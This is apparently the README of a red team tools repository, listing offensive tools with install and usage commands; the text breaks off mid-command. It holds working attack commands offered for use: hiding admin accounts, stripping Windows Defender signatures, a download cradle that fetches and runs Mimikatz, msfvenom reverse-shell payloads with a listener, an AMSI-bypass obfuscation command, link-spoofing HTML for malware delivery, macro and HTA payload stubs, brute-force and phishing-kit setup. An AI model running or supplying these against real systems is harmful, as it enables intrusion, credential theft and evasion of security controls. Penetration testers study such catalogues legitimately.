A-poc/RedTeam-Tools

Tools and Techniques for Red Team / Penetration Testing

RedTeam-Tools

This github repository contains a collection of 130+ tools and resources that can be useful for red teaming activities.

Some of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.

🔗 If you are a Blue Teamer, check out BlueTeam-Tools

Warning

The materials in this repository are for informational and educational purposes only. They are not intended for use in any illegal activities.

Note

Hide Tool List headings with the arrow.

Click 🔙 to get back to the list.

Tool List

Red Team Tips 17 tips
Reconnaissance 20 tools
Resource Development 11 tools
Initial Access 6 tools
Execution 13 tools
Persistence 4 tools
Privilege Escalation 10 tools
Defense Evasion 8 tools
    • Invoke-Obfuscation Script obfuscator
    • Veil Metasploit payload obfuscator
    • SharpBlock EDR bypass via entry point execution prevention
    • Alcatraz GUI x64 binary obfuscator
    • Mangle Compiled executable manipulation
    • AMSI Fail PowerShell snippets that break or disable AMSI
    • ScareCrow Payload creation framework designed around EDR bypass
    • moonwalk Linux system log and filesystem timestamp remover
Credential Access 11 tools
Discovery 6 tools
    • PCredz Credential discovery PCAP/live interface
    • PingCastle Active directory assessor
    • Seatbelt Local vulnerability scanner
    • ADRecon Active directory recon
    • adidnsdump Active Directory Integrated DNS dumping
    • scavenger Scanning tool for scavenging systems
Lateral Movement 12 tools
Collection 3 tools
    • BloodHound Active directory visualisation
    • Snaffler Active directory credential collector
    • linWinPwn Active Directory Enumeration and Vulnerability checks
Command and Control 9 tools
Exfiltration 5 tools
Impact 4 tools

Red Team Tips

Learn from Red Teamers with a collection of Red Teaming Tips. These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.

Note: Nearly all tips are currently from @Alh4zr3d, who posts good Red Team Tips!

🔙Hiding the local admin account

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f

Description: 'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'

Credit: @Alh4zr3d

Link: Twitter

🔙Cripple windows defender by deleting signatures

"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Description: 'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'

Credit: @Alh4zr3d

Link: Twitter

🔙Enable multiple RDP sessions per user

reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f

Description: 'Sometimes you want to log in to a host via RDP or similar, but your user has an active session. Enable multiple sessions per user.'

Credit: @Alh4zr3d

Link: Twitter

🔙Sysinternals PsExec.exe local alternative

wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "

Description: 'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. Try this instead.'

Credit: @GuhnooPlusLinux

Link: Twitter

🔙Live off the land port scanner

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$_)) "Port $_ open"} 2>$null

Description: 'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell/.NET help. Ex: simple port scanner in Powershell.'

Credit: @Alh4zr3d

Link: Twitter

🔙Proxy aware PowerShell DownloadString

$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")

Description: 'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. Use this one.'

Credit: @Alh4zr3d

Link: Twitter

🔙Looking for internal endpoints in browser bookmarks

type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"

Description: 'You'd be surprised what you can find out from a user's bookmarks alone. Internal endpoints they can access, for instance.'

Credit: @Alh4zr3d

Link: Twitter

🔙Query DNS records for enumeration

Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>

Description: 'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. Why not just ask the DC/DNS server for all DNS records?'

Credit: @Alh4zr3d

Link: Twitter

🔙Unquoted service paths without PowerUp

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

Description: 'Finding unquoted service paths without PowerUp'

Credit: @Alh4zr3d

Link: Twitter

🔙Bypass a disabled command prompt with /k

# Win+R (To bring up Run Box)
cmd.exe /k "whoami"

Description: 'This command prompt has been disabled by your administrator...' can usually be seen in environments such as kiosk PCs. A quick, hacky workaround is to use /k via the Windows Run box. This will carry out the command and then show the restriction message, allowing for command execution.

Credit: Martin Sohn Christensen

Link: Blog

🔙Stop windows defender deleting mimikatz.exe

(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv

Description: 'Are you tired of Windows Defender deleting mimikatz.exe? Try this instead.'

Credit: @GuhnooPlusLinux

Link: Twitter

🔙Check if you are in a virtual machine

reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"

Description: 'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! If any results show up then you are in a Virtual Machine.'

Credit: @dmcxblue

Link: Twitter

🔙Enumerate AppLocker rules

(Get-AppLockerPolicy -Local).RuleCollections

Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

Description: 'AppLocker can be a pain. Enumerate to see how painful'

Credit: @Alh4zr3d

Link: Twitter

🔙CMD shortcut with 6 pixels via mspaint

  1. Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
  2. Zoom in to make the following tasks easier
  3. Using the colour picker, set pixels values to (from left to right):
    • 1st: R: 10, G: 0, B: 0
    • 2nd: R: 13, G: 10, B: 13
    • 3rd: R: 100, G: 109, B: 99
    • 4th: R: 120, G: 101, B: 46
    • 5th: R: 0, G: 0, B: 101
    • 6th: R: 0, G: 0, B: 0
  4. Save it as 24-bit Bitmap (.bmp;.dib)
  5. Change its extension from bmp to bat and run.

Description: 'An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours.'

Credit: PenTestPartners

Link: Blog

🔙Link spoofing with PreventDefault JavaScript method

<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>PreventDefault Example</title>
  </head>
  <body>
    <a href="https://google.com" onclick="event.preventDefault(); window.location.href = 'https://bing.com';">Go to Google</a>
  </body>
</html>

Description: Threat actors have been observed using this technique to trick victims into clicking spoofed in-page malware download links. Using the PreventDefault JavaScript method you can spoof the hover link so that it displays a legitimate link (google.com), but once clicked the victim is redirected to your malicious link (bing.com). Great for getting victims to download payloads via a controlled site.

Link: PreventDefault Docs

🔙Check SMB firewall rules with Responder

Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"

Description: 'When I do a Compromise Assessment, I often ask the customer if I can do a last quick check: Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$". If Responder could capture the hash, the firewall allows outgoing SMB connections'

Credit: @malmoeb

Link: Twitter

🔙Disable AV with SysInternals PsSuspend

Description: Using the Microsoft Sysinternals tool PsSuspend.exe it is possible to suspend some AV service executables. The Microsoft-signed tool can be passed the PID or name of a running service, and it will suspend the process via the NtSuspendProcess Windows API.

Related Blog Post: Bypassing AV via Process Suspension with PsSuspend.exe

Link: Twitter

Reconnaissance

🔙crt.sh -> httprobe -> EyeWitness

I have put together a bash one-liner that:

  • Passively collects a list of subdomains from certificate associations (crt.sh)
  • Actively requests each subdomain to verify its existence (httprobe)
  • Actively screenshots each subdomain for manual review (EyeWitness)

Usage:

domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web

Note: You must have httprobe, pup and EyeWitness installed and change 'DOMAIN_COM' to the target domain. You can run this script concurrently in multiple terminal windows if you have multiple target root domains.

A JavaScript bookmarklet for extracting all webpage endpoint links on a page.

Created by @renniepak, this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage.

javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();

Usage (Bookmarklet)

Create a bookmarklet...

  • Right click your bookmark bar
  • Click 'Add Page'
  • Paste the above JavaScript in the 'url' box
  • Click 'Save'

...then visit the victim page in the browser and click the bookmarklet.

Usage (Console)

Paste the above JavaScript into the console window (F12) and press Enter.

🔙nuclei

Fast vulnerability scanner that uses .yaml templates to search for specific issues.

Install:

go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

Usage:

cat domains.txt | nuclei -t /PATH/nuclei-templates/

🔙certSniff

certSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file.

You can set this running with several keywords relating to your victim domain; any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.

Install:

git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt

Usage:

python3 certSniff.py -f example.txt

🔙gobuster

Nice tool for brute-forcing file/folder paths on a victim website.

Install:

sudo apt install gobuster

Usage:

gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

🔙Feroxbuster

A tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.

Feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc.

Install: (Kali)

sudo apt update && sudo apt install -y feroxbuster

Install: (Mac)

curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash

Install: (Windows)

Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

For full installation instructions see here.

Usage:

# Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url
./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx

# Scan with headers
./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"

# Read URLs from stdin
cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

# Proxy requests through burpsuite
./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080

Full usage examples can be found here.

Image used from https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif

🔙CloudBrute

A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).

Features:

  • Cloud detection (IPINFO API and Source Code)
  • Fast (concurrent)
  • Cross Platform (windows, linux, mac)
  • User-Agent Randomization
  • Proxy Randomization (HTTP, Socks5)

Install:

Download the latest release for your system and follow the usage.

Usage:

# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

Image used from https://github.com/0xsha/CloudBrute

🔙dnsrecon

dnsrecon is a Python tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.

Install:

sudo apt install dnsrecon

Usage:

dnsrecon -d google.com

🔙Shodan

Shodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name or IP address, it is possible to discover potentially vulnerable systems relating to your target via Shodan.

🔙AORT

Tool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.

Install:

git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt

Usage:

python3 AORT.py -d google.com

🔙spoofcheck

A program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally, it will alert if the domain has a DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails.

Domains are spoofable if any of the following conditions are met:

  • Lack of an SPF or DMARC record
  • SPF record never specifies ~all or -all
  • DMARC policy is set to p=none or is nonexistent

Install:

git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt

Usage:

./spoofcheck.py [DOMAIN]

🔙AWSBucketDump

AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.

Install:

git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt

Usage:

usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]

optional arguments:
  -h, --help    show this help message and exit
  -D            Download files. This requires significant diskspace
  -d            If set to 1 or True, create directories for each host w/ results
  -t THREADS    number of threads
  -l HOSTLIST
  -g GREPWORDS  Provide a wordlist to grep for
  -m MAXSIZE    Maximum file size to download.

 python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1

🔙GitHarvester

Nice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects.

Install:

git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester

Usage:

./githarvester.py

🔙TruffleHog

TruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.

Install (Binaries): Link

Install (Go):

git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install

Usage:

trufflehog https://github.com/trufflesecurity/test_keys

🔙Dismap

Dismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks.

Dismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.

Install:

Dismap is a binary file for Linux, MacOS, and Windows. Go to Release to download the corresponding version to run:

# Linux or MacOS
chmod +x dismap-0.3-linux-amd64
./dismap-0.3-linux-amd64 -h

# Windows
dismap-0.3-windows-amd64.exe -h

Usage:

# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24

# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json

# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10

# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

Image used from https://github.com/zhzyker/dismap

🔙enum4linux

A tool for enumerating information from Windows and Samba systems.

It can be used to gather a wide range of information, including:

  • Domain and domain controller information
  • Local user and group information
  • Shares and share permissions
  • Security policies
  • Active Directory information

Install: (Apt)

sudo apt install enum4linux

Install: (Git)

git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux

Usage:

# 'Do everything'
enum4linux.pl -a 192.168.2.55

# Obtain list of usernames (RestrictAnonymous = 0)
enum4linux.pl -U 192.168.2.55

# Obtain list of usernames (using authentication)
enum4linux.pl -u administrator -p password -U 192.168.2.55

# Get a list of groups and their members
enum4linux.pl -G 192.168.2.55

# Verbose scan 
enum4linux.pl -v 192.168.2.55

Full usage information can be found in this blog.

Image used from https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/

🔙skanuvaty

Dangerously fast DNS/network/port scanner, created by Esc4iCEscEsc, written in Rust.

You will need a subdomains file. E.g. Subdomain wordlist by Sublist3r.

Install:

Download the latest release from here.

# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists

Usage:

skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

Image used from https://github.com/Esc4iCEscEsc/skanuvaty

🔙Metabigor

Metabigor is an intelligence tool; its goal is to do OSINT tasks and more, without needing any API key.

Main Features:

  • Searching information about IP address, ASN and organization.
  • Wrapper for running rustscan, masscan and nmap more efficiently on IP/CIDR.
  • Finding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc).
  • Get a summary about an IP address (powered by @thebl4ckturtle)

Install:

go install github.com/j3ssie/metabigor@latest

Usage:

# discovery IP of a company/organization
echo "company" | metabigor net --org -o /tmp/result.txt

# Getting more related domains by searching for certificate info
echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command

# Only run rustscan with full ports
echo '1.2.3.4/24' | metabigor scan -o result.txt

# Reverse Whois to find related domains
echo 'example.com' | metabigor related -s 'whois'

# Get Google Analytics ID directly from the URL
echo 'https://example.com' | metabigor related -s 'google-analytic'

Image used from https://github.com/j3ssie/metabigor

🔙Gitrob

Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github.

Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.

The findings will be presented through a web interface for easy browsing and analysis.

Note: Gitrob will need a Github access token in order to interact with the Github API. Create a personal access token and save it in an environment variable in your .bashrc or similar shell configuration file:

export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef

Install: (Go)

go get github.com/michenriksen/gitrob

Install: (Binary)

A precompiled version is available for each release.

Usage:

# Run against org
gitrob {org_name}

# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp

# Loading session from a file
gitrob -load ~/gitrob-session.json

Image used from https://www.uedbox.com/post/58828/

🔙Gowitness

Gowitness is a website screenshot utility written in Golang that uses Chrome Headless to generate screenshots of web interfaces from the command line, with a handy report viewer to process results. Both Linux and macOS are supported, with Windows support mostly working.

Install: (Go)

go install github.com/sensepost/gowitness@latest

Full installation information can be found here.

Usage:

# Screenshot a single website
gowitness single https://www.google.com/

# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20

# Screenshot open http services from an nmap file
gowitness nmap -f nmap.xml --open --service-contains http

# Run the report server
gowitness report serve

Full usage information can be found here.

Image used from https://github.com/sensepost/gowitness

Resource Development

🔙Chimera

Chimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.

Install:

sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help

Usage:

./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

🔙Msfvenom

Msfvenom allows the creation of payloads for various operating systems in a wide range of formats. It also supports obfuscation of payloads for AV bypass.

Set Up Listener

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your-ip
set LPORT listening-port
run

Msfvenom Commands

PHP:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.9 lport=1234 R

Windows:

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

Linux:

msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

Java:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

HTA:

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

🔙Shellter

Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.

It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).

Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.

Full README information can be found here.

Install: (Kali)

apt-get update
apt-get install shellter

Install: (Windows)

Visit the download page and install.

Usage:

Just pick a legit binary to backdoor and run Shellter.

Some nice tips can be found here.

Lots of community usage demos can be found here.

Image used from https://www.kali.org/tools/shellter/images/shellter.png

🔙Freeze

Freeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner.

Freeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.

Install:

git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go

Usage:

  -I string
        Path to the raw 64-bit shellcode.
  -O string
        Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.
  -console
        Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
  -encrypt
        Encrypts the shellcode using AES 256 encryption
  -export string
        For DLL Loaders Only - Specify a specific Export function for a loader to have.
  -process string
        The name of process to spawn. This process has to exist in C:\Windows\System32\. Example 'notepad.exe' (default "notepad.exe")
  -sandbox
        Enables sandbox evasion by checking:
                Is Endpoint joined to a domain?
                Does the Endpoint have more than 2 CPUs?
                Does the Endpoint have more than 4 gigs of RAM?
  -sha256
        Provides the SHA256 value of the loaders (This is useful for tracking)

Image used from https://www.blackhatethicalhacking.com/tools/freeze/

🔙WordSteal

This script will create a Microsoft Word document with a remote image, allowing for the capture of NTLM hashes from a remote victim endpoint.

Microsoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker-controlled SMB server. This gives you the opportunity to listen for, and capture, NTLM hashes that are sent when an authenticated victim opens the Word document and renders the image.

Install:

git clone https://github.com/0x09AL/WordSteal
cd WordSteal

Usage:

# Generate document containing 'test.jpg' and start listener
./main.py 127.0.0.1 test.jpg 1

# Generate document containing 'test.jpg' and do not start listener
./main.py 127.0.0.1 test.jpg 0

Image used from https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/

This site provides information on undocumented Windows internals, system calls, data structures, and other low-level details of the Windows operating system.

It can be a valuable resource for individuals who want to explore the internals of Windows for various purposes, including vulnerability analysis, exploit development, and privilege escalation.

When developing exploits, understanding the internals of the target system is crucial. This site can help develop exploits by leveraging the low-level undocumented aspects of Windows.

Usage:

Visit http://undocumented.ntinternals.net/

Image used from http://undocumented.ntinternals.net/

This technical note provides a comprehensive list of all the APIs exported by the Windows kernel for driver writers to register callback routines that are invoked by kernel components under various circumstances.

Most of these routines are documented in the Windows Driver Kit (WDK) but some of them are for use by in-box drivers.

The undocumented functions are described briefly whereas the documented ones are just listed here for reference.

Usage:

Visit https://codemachine.com/articles/kernel_callback_functions.html

Image used from https://codemachine.com

🔙OffensiveVBA

A collection of offensive techniques, scripts and useful links for achieving code execution and defense evasion via office macros.

Usage:

Visit https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo

Image used from https://github.com/S3cur3Th1sSh1t

🔙WSH

Creating payload:

Set shell = WScript.CreateObject("WScript.Shell")
' Run calc.exe with this script's own path as its argument; window style 0 (hidden), wait for it to exit
shell.Run "C:\Windows\System32\calc.exe " & WScript.ScriptFullName, 0, True

Execute:

wscript payload.vbs
cscript.exe payload.vbs

# If .vbs files are blacklisted, run the script from a .txt file with an explicit engine
wscript /e:VBScript payload.txt

🔙HTA

Creating payload:

<html>
<body>
<script>
	var c= 'cmd.exe'
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

Execute: Run file

🔙VBA

Creating payload:

Sub calc()
	Dim payload As String
	payload = "calc.exe"
	CreateObject("Wscript.Shell").Run payload,0
End Sub

Execute: Set function to Auto_Open() in macro enabled document

Initial Access

🔙Bash Bunny

The Bash Bunny is a physical USB attack tool and multi-function payload delivery system. It is designed to be plugged into a computer's USB port and can be programmed to perform a variety of functions, including manipulating and exfiltrating data, installing malware, and bypassing security measures.

hackinglab: Bash Bunny – Guide

Hak5 Documentation

Nice Payload Repo

Product Page

🔙evilgophish

evilginx2 + gophish. GoPhish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing. evilginx2 is a standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication.

Install:

git clone https://github.com/fin3ss3g0d/evilgophish

Usage:

Usage:
./setup <root domain> <subdomain(s)> <root domain bool> <redirect url> <feed bool> <rid replacement> <blacklist bool>
 - root domain                     - the root domain to be used for the campaign
 - subdomains                      - a space separated list of evilginx2 subdomains, can be one if only one
 - root domain bool                - true or false to proxy root domain to evilginx2
 - redirect url                    - URL to redirect unauthorized Apache requests
 - feed bool                       - true or false if you plan to use the live feed
 - rid replacement                 - replace the gophish default "rid" in phishing URLs with this value
 - blacklist bool                  - true or false to use Apache blacklist
Example:
  ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false

🔙Social Engineering Toolkit (SET)

This framework is great for creating campaigns for initial access: 'SET has a number of custom attack vectors that allow you to make a believable attack quickly'.

Install:

git clone https://github.com/IO1337/social-engineering-toolkit; cd social-engineering-toolkit; python setup.py install

Usage:

python3 setoolkit

🔙Hydra

Nice tool for logon brute-force attacks. Can brute-force a number of services including SSH, FTP, TELNET, HTTP etc.

Install:

sudo apt install hydra

Usage:

hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username=^USER^&password=^PASS^:Error"
hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

🔙SquarePhish

SquarePhish is an advanced phishing tool that uses a technique combining OAuth Device code authentication flow and QR codes (See PhishInSuits for more about OAuth Device Code flow for phishing attacks).

Attack Steps:

  • Send malicious QR code to victim
  • Victim scans QR code with mobile device
  • Victim directed to attacker controlled server (Triggering OAuth Device Code authentication flow process)
  • Victim emailed MFA code (Triggering OAuth Device Code flow 15 minute timer)
  • Attacker polls for authentication
  • Victim enters code into legit Microsoft website
  • Attacker saves authentication token

Install:

git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt

Note: Before using either module, update the required information in the settings.config file noted with Required.

Usage (Email Module):

usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

  -e EMAIL, --email EMAIL
                        victim email address to send initial QR code email to

Usage (Server Module):

usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

🔙King Phisher

King Phisher is a tool that allows attackers to create and send phishing emails to victims to obtain sensitive information.

It includes features like customizable templates, campaign management, and email sending capabilities, making it a powerful and easy-to-use tool for carrying out phishing attacks. With King Phisher, attackers can target individuals or organizations with targeted and convincing phishing emails, increasing the chances of success in their attacks.

Install (Linux - Client & Server):

wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && \
sudo bash